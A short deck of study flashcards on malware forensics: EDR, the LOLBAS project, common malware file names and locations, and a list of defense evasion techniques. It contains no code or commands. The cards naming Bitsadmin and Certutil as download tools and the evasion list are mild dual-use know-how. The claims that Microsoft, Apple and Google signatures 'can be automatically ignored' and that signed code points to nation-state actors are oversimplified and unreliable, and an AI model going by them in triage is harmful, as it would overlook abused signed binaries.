Section 1.3: Malware-ology Flashcards
What is the Malware Paradox?
That malware can hide, but it must run.
What are the three compromise types?
Active malware, Dormant malware (not active or cleaned), and Living off the Land.
Define Endpoint Detection and Response (EDR)?
It is a security solution that combines real-time continuous monitoring and collection of endpoint data by set rules.
Name some common malware names.
svchost.exe, iexplore.exe, explorer.exe, lsass.exe, win.exe, and winlogon.exe
Name some common malware locations.
Temp, AppData, $Recycle.Bin, ProgramData, Windows, System32, WinSxS, System Volumne Information, Program Files, and Program Files (x86).
What is the purpose of LOLBAS Project (Living off the Land Binaries and Scripts)?
It helps categorize attacker use cases for legitimate Windows binaries.
What legitimate binaries can help adversaries do stealthy file downloading?
Bitsadmin.exe and Certutil.exe. They are abused to decode obfuscated payloads in order to avoid host-based security.
When a binary or DLL has a colon, what is that an indication of?
It is an indication of an alternative data stream.
List common defense evasion techniques attackers use to avoid detection.
Service Hijacking/replacement, Process injection, Filename/Service hijacking, Alternate data streams, Webshells/beacons, Firmware, DLL injections, A/V bypass, Frequent Compilation, Binary padding, Packing/armoring, Dormant malware, Signing code, Anti-forensics/timestomping, Rootkits, and Fileless malware.
Why are code-signing private keys attractive to adversaries?
If stolen, they can sign their malware and can give easy access to operating systems that allow certain publishers. EX: Adobe, Opera browser.
Who is likely to have signed code?
Nation-State threat actors.
Which publishers are likely to be legitimate?
Microsoft, Apple, and Google. These can be automatically ignored.